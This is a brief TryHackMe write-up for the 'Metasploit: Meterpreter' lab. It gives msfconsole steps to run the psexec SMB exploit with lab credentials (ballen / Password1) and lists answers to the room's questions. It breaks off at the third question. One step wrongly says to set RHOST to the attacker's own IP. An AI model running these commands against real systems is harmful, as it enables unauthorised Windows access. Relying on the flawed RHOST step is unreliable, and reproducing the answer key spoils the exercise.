Metasploit: Meterpreter — TryHackme Simple Writeup
Simple TryHackme’s Metasploit: Meterpreter Writeup | Karthikeyan Nagaraj
First Step is to connect to the TryHackMe’s Vpn or Open Attack Box and Start the Machine
- Open Terminal and type
msfconsole - Then use the Exploit as
exploit/windows/smb/psexec - Set the
RHOSTas your Attacking Machine IP - Set the
SMBUserasBallen - Set the
SMBPassasPassword1 - Finally type the
runCommand
msfconsole
use exploit/windows/smb/psexec
set SMBUser ballen
set SMBPass Password1
run1. What is the computer name?
We have to use the command sysinfo to get information about the system
Ans: ACME-TEST2. What is the target domain?
Ans: FLASH3. What is the name of the share likely created by the user?
Now we have to use the post module ,so First we have to background the session